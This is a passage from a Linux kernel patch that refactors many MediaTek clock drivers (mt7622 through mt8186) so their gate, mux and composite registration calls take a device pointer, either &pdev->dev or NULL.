+ 				  clk_data);
+@@ -663,7 +664,7 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls),
+ 			      clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -682,10 +683,11 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+-	mtk_clk_register_composites(peri_muxes, ARRAY_SIZE(peri_muxes), base,
++	mtk_clk_register_composites(&pdev->dev, peri_muxes,
++				    ARRAY_SIZE(peri_muxes), base,
+ 				    &mt7622_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index e1d2635c72c10..eab838af6d413 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -82,7 +82,8 @@ static int clk_mt7629_ethsys_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, eth_clks, CLK_ETH_NR_CLK, clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, eth_clks,
++			       CLK_ETH_NR_CLK, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -106,8 +107,8 @@ static int clk_mt7629_sgmiisys_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, sgmii_clks[id++], CLK_SGMII_NR_CLK,
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, sgmii_clks[id++],
++			       CLK_SGMII_NR_CLK, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7629-hif.c b/drivers/clk/mediatek/clk-mt7629-hif.c
+index 3628811a2f57f..804900792e490 100644
+--- a/drivers/clk/mediatek/clk-mt7629-hif.c
++++ b/drivers/clk/mediatek/clk-mt7629-hif.c
+@@ -75,8 +75,8 @@ static int clk_mt7629_ssusbsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SSUSB_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, ssusb_clks, ARRAY_SIZE(ssusb_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, ssusb_clks,
++			       ARRAY_SIZE(ssusb_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -97,8 +97,8 @@ static int clk_mt7629_pciesys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PCIE_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, pcie_clks, ARRAY_SIZE(pcie_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, pcie_clks,
++			       ARRAY_SIZE(pcie_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index 01ee45fcd7e34..2019e272d1cd7 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -566,8 +566,9 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs),
+ 				 clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes),
+-				    base, &mt7629_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt7629_clk_lock, clk_data);
+ 
+ 	clk_prepare_enable(clk_data->hws[CLK_TOP_AXI_SEL]->clk);
+ 	clk_prepare_enable(clk_data->hws[CLK_TOP_MEM_SEL]->clk);
+@@ -585,8 +586,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	mtk_clk_register_cpumuxes(node, infra_muxes, ARRAY_SIZE(infra_muxes),
+ 				  clk_data);
+@@ -610,10 +611,11 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+-	mtk_clk_register_composites(peri_muxes, ARRAY_SIZE(peri_muxes), base,
++	mtk_clk_register_composites(&pdev->dev, peri_muxes,
++				    ARRAY_SIZE(peri_muxes), base,
+ 				    &mt7629_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -637,7 +639,7 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls),
+ 			      clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	clk_prepare_enable(clk_data->hws[CLK_APMIXED_ARMPLL]->clk);
+diff --git a/drivers/clk/mediatek/clk-mt7986-eth.c b/drivers/clk/mediatek/clk-mt7986-eth.c
+index c21e1d672384a..e04bc6845ea6d 100644
+--- a/drivers/clk/mediatek/clk-mt7986-eth.c
++++ b/drivers/clk/mediatek/clk-mt7986-eth.c
+@@ -72,8 +72,8 @@ static void __init mtk_sgmiisys_0_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(ARRAY_SIZE(sgmii0_clks));
+ 
+-	mtk_clk_register_gates(node, sgmii0_clks, ARRAY_SIZE(sgmii0_clks),
+-			       clk_data);
++	mtk_clk_register_gates(NULL, node, sgmii0_clks,
++			       ARRAY_SIZE(sgmii0_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -90,8 +90,8 @@ static void __init mtk_sgmiisys_1_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(ARRAY_SIZE(sgmii1_clks));
+ 
+-	mtk_clk_register_gates(node, sgmii1_clks, ARRAY_SIZE(sgmii1_clks),
+-			       clk_data);
++	mtk_clk_register_gates(NULL, node, sgmii1_clks,
++			       ARRAY_SIZE(sgmii1_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -109,7 +109,7 @@ static void __init mtk_ethsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(ARRAY_SIZE(eth_clks));
+ 
+-	mtk_clk_register_gates(node, eth_clks, ARRAY_SIZE(eth_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, eth_clks, ARRAY_SIZE(eth_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index 74e68a7197301..0a4bf87ee1607 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -178,10 +178,11 @@ static int clk_mt7986_infracfg_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	mtk_clk_register_factors(infra_divs, ARRAY_SIZE(infra_divs), clk_data);
+-	mtk_clk_register_muxes(infra_muxes, ARRAY_SIZE(infra_muxes), node,
++	mtk_clk_register_muxes(&pdev->dev, infra_muxes,
++			       ARRAY_SIZE(infra_muxes), node,
+ 			       &mt7986_clk_lock, clk_data);
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt7986-topckgen.c b/drivers/clk/mediatek/clk-mt7986-topckgen.c
+index de5121cf28774..c9bf47e6098fd 100644
+--- a/drivers/clk/mediatek/clk-mt7986-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt7986-topckgen.c
+@@ -303,7 +303,8 @@ static int clk_mt7986_topckgen_probe(struct platform_device *pdev)
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				    clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
+ 			       &mt7986_clk_lock, clk_data);
+ 
+ 	clk_prepare_enable(clk_data->hws[CLK_TOP_SYSAXI_SEL]->clk);
+diff --git a/drivers/clk/mediatek/clk-mt8135.c b/drivers/clk/mediatek/clk-mt8135.c
+index 3ea06d2ec2f11..a39ad58e27418 100644
+--- a/drivers/clk/mediatek/clk-mt8135.c
++++ b/drivers/clk/mediatek/clk-mt8135.c
+@@ -536,8 +536,9 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_factors(root_clk_alias, ARRAY_SIZE(root_clk_alias), clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-			&mt8135_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8135_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -553,8 +554,8 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -579,10 +580,11 @@ static void __init mtk_pericfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_gates, ARRAY_SIZE(peri_gates),
+-						clk_data);
+-	mtk_clk_register_composites(peri_clks, ARRAY_SIZE(peri_clks), base,
+-			&mt8135_clk_lock, clk_data);
++	mtk_clk_register_gates(NULL, node, peri_gates,
++			       ARRAY_SIZE(peri_gates), clk_data);
++	mtk_clk_register_composites(NULL, peri_clks,
++				    ARRAY_SIZE(peri_clks), base,
++				    &mt8135_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8167-aud.c b/drivers/clk/mediatek/clk-mt8167-aud.c
+index b5ac196cd9454..47a7d89d5777c 100644
+--- a/drivers/clk/mediatek/clk-mt8167-aud.c
++++ b/drivers/clk/mediatek/clk-mt8167-aud.c
+@@ -50,7 +50,7 @@ static void __init mtk_audsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUD_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8167-img.c b/drivers/clk/mediatek/clk-mt8167-img.c
+index 4e7c0772b4f99..e196b3b894a16 100644
+--- a/drivers/clk/mediatek/clk-mt8167-img.c
++++ b/drivers/clk/mediatek/clk-mt8167-img.c
+@@ -42,7 +42,7 @@ static void __init mtk_imgsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IMG_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, img_clks, ARRAY_SIZE(img_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, img_clks, ARRAY_SIZE(img_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+index 192714498b2ec..602d25f4cb2e2 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+@@ -40,7 +40,7 @@ static void __init mtk_mfgcfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MFG_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mfg_clks, ARRAY_SIZE(mfg_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, mfg_clks, ARRAY_SIZE(mfg_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167-mm.c b/drivers/clk/mediatek/clk-mt8167-mm.c
+index a94961b7b8cc6..abc70e1221bf9 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mm.c
++++ b/drivers/clk/mediatek/clk-mt8167-mm.c
+@@ -98,8 +98,8 @@ static int clk_mt8167_mm_probe(struct platform_device *pdev)
+ 
+ 	data = &mt8167_mmsys_driver_data;
+ 
+-	ret = mtk_clk_register_gates(node, data->gates_clk, data->gates_num,
+-				     clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, data->gates_clk,
++				     data->gates_num, clk_data);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167-vdec.c b/drivers/clk/mediatek/clk-mt8167-vdec.c
+index 38f0ba357d599..92bc05d997985 100644
+--- a/drivers/clk/mediatek/clk-mt8167-vdec.c
++++ b/drivers/clk/mediatek/clk-mt8167-vdec.c
+@@ -49,7 +49,8 @@ static void __init mtk_vdecsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VDEC_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, vdec_clks, ARRAY_SIZE(vdec_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, vdec_clks, ARRAY_SIZE(vdec_clks),
++			       clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167.c b/drivers/clk/mediatek/clk-mt8167.c
+index f900ac4bf7b8d..91669ebafaf9b 100644
+--- a/drivers/clk/mediatek/clk-mt8167.c
++++ b/drivers/clk/mediatek/clk-mt8167.c
+@@ -937,11 +937,12 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks),
+ 				    clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, top_clks, ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-		&mt8167_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8167_clk_lock, clk_data);
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				base, &mt8167_clk_lock, clk_data);
+ 
+@@ -966,8 +967,9 @@ static void __init mtk_infracfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IFR_NR_CLK);
+ 
+-	mtk_clk_register_composites(ifr_muxes, ARRAY_SIZE(ifr_muxes), base,
+-		&mt8167_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, ifr_muxes,
++				    ARRAY_SIZE(ifr_muxes), base,
++				    &mt8167_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8173-mm.c b/drivers/clk/mediatek/clk-mt8173-mm.c
+index 5826eabdc9c77..444a3d58c8bf5 100644
+--- a/drivers/clk/mediatek/clk-mt8173-mm.c
++++ b/drivers/clk/mediatek/clk-mt8173-mm.c
+@@ -112,8 +112,8 @@ static int clk_mt8173_mm_probe(struct platform_device *pdev)
+ 
+ 	data = &mt8173_mmsys_driver_data;
+ 
+-	ret = mtk_clk_register_gates(node, data->gates_clk, data->gates_num,
+-				     clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, data->gates_clk,
++				     data->gates_num, clk_data);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8173.c b/drivers/clk/mediatek/clk-mt8173.c
+index b8529ee7199da..d05c1109b4f87 100644
+--- a/drivers/clk/mediatek/clk-mt8173.c
++++ b/drivers/clk/mediatek/clk-mt8173.c
+@@ -869,8 +869,9 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks), clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-			&mt8173_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8173_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -888,8 +889,8 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 	mtk_clk_register_factors(infra_divs, ARRAY_SIZE(infra_divs), clk_data);
+ 
+ 	mtk_clk_register_cpumuxes(node, cpu_muxes, ARRAY_SIZE(cpu_muxes),
+@@ -918,10 +919,11 @@ static void __init mtk_pericfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_gates, ARRAY_SIZE(peri_gates),
+-						clk_data);
+-	mtk_clk_register_composites(peri_clks, ARRAY_SIZE(peri_clks), base,
+-			&mt8173_clk_lock, clk_data);
++	mtk_clk_register_gates(NULL, node, peri_gates,
++			       ARRAY_SIZE(peri_gates), clk_data);
++	mtk_clk_register_composites(NULL, peri_clks,
++				    ARRAY_SIZE(peri_clks), base,
++				    &mt8173_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -1062,8 +1064,8 @@ static void __init mtk_imgsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IMG_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, img_clks, ARRAY_SIZE(img_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, img_clks,
++			       ARRAY_SIZE(img_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -1080,8 +1082,8 @@ static void __init mtk_vdecsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VDEC_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, vdec_clks, ARRAY_SIZE(vdec_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, vdec_clks,
++			       ARRAY_SIZE(vdec_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -1097,8 +1099,8 @@ static void __init mtk_vencsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VENC_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, venc_clks, ARRAY_SIZE(venc_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, venc_clks,
++			       ARRAY_SIZE(venc_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -1114,8 +1116,8 @@ static void __init mtk_vencltsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VENCLT_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, venclt_clks, ARRAY_SIZE(venclt_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, venclt_clks,
++			       ARRAY_SIZE(venclt_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8183-audio.c b/drivers/clk/mediatek/clk-mt8183-audio.c
+index b2d7746eddbed..f358a6e7a3408 100644
+--- a/drivers/clk/mediatek/clk-mt8183-audio.c
++++ b/drivers/clk/mediatek/clk-mt8183-audio.c
+@@ -75,8 +75,8 @@ static int clk_mt8183_audio_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUDIO_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, audio_clks, ARRAY_SIZE(audio_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, audio_clks,
++			       ARRAY_SIZE(audio_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8183-mm.c b/drivers/clk/mediatek/clk-mt8183-mm.c
+index 11ecc6fb0065b..3580315309132 100644
+--- a/drivers/clk/mediatek/clk-mt8183-mm.c
++++ b/drivers/clk/mediatek/clk-mt8183-mm.c
+@@ -90,8 +90,8 @@ static int clk_mt8183_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt8183.c b/drivers/clk/mediatek/clk-mt8183.c
+index 1860a35a723a5..78620244144e8 100644
+--- a/drivers/clk/mediatek/clk-mt8183.c
++++ b/drivers/clk/mediatek/clk-mt8183.c
+@@ -1172,8 +1172,8 @@ static int clk_mt8183_apmixed_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks, ARRAY_SIZE(apmixed_clks),
+-		clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
++			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -1238,17 +1238,20 @@ static int clk_mt8183_top_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
+ 
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes),
+-		node, &mt8183_clk_lock, top_clk_data);
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
++			       &mt8183_clk_lock, top_clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_muxes, ARRAY_SIZE(top_aud_muxes),
+-		base, &mt8183_clk_lock, top_clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_muxes,
++				    ARRAY_SIZE(top_aud_muxes), base,
++				    &mt8183_clk_lock, top_clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_divs, ARRAY_SIZE(top_aud_divs),
+-		base, &mt8183_clk_lock, top_clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_divs,
++				    ARRAY_SIZE(top_aud_divs), base,
++				    &mt8183_clk_lock, top_clk_data);
+ 
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-		top_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), top_clk_data);
+ 
+ 	ret = clk_mt8183_reg_mfg_mux_notifier(&pdev->dev,
+ 					      top_clk_data->hws[CLK_TOP_MUX_MFG]->clk);
+@@ -1267,8 +1270,8 @@ static int clk_mt8183_infra_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-		clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+@@ -1290,8 +1293,8 @@ static int clk_mt8183_peri_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -1308,8 +1311,9 @@ static int clk_mt8183_mcu_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MCU_NR_CLK);
+ 
+-	mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes), base,
+-			&mt8183_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++				    ARRAY_SIZE(mcu_muxes), base,
++				    &mt8183_clk_lock, clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt8186-mcu.c b/drivers/clk/mediatek/clk-mt8186-mcu.c
+index dfc305c1fc5d8..e52a2d986c99c 100644
+--- a/drivers/clk/mediatek/clk-mt8186-mcu.c
++++ b/drivers/clk/mediatek/clk-mt8186-mcu.c
+@@ -65,7 +65,8 @@ static int clk_mt8186_mcu_probe(struct platform_device *pdev)
+ 		goto free_mcu_data;
+ 	}
+ 
+-	r = mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes), base,
++	r = mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++					ARRAY_SIZE(mcu_muxes), base,
+ 					NULL, clk_data);
+ 	if (r)
+ 		goto free_mcu_data;
+diff --git a/drivers/clk/mediatek/clk-mt8186-mm.c b/drivers/clk/mediatek/clk-mt8186-mm.c
+index 1d33be4079470..0b72607777fa1 100644
+--- a/drivers/clk/mediatek/clk-mt8186-mm.c
++++ b/drivers/clk/mediatek/clk-mt8186-mm.c
+@@ -69,7 +69,8 @@ static int clk_mt8186_mm_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++				   ARRAY_SIZE(mm_clks), clk_data);
+ 	if (r)
+ 		goto free_mm_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8186-topckgen.c b/drivers/clk/mediatek/clk-mt8186-topckgen.c
+index d7f2c4663c853..70b6e008a188b 100644
+--- a/drivers/clk/mediatek/clk-mt8186-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt8186-topckgen.c
+@@ -715,17 +715,20 @@ static int clk_mt8186_topck_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto unregister_fixed_clks;
+ 
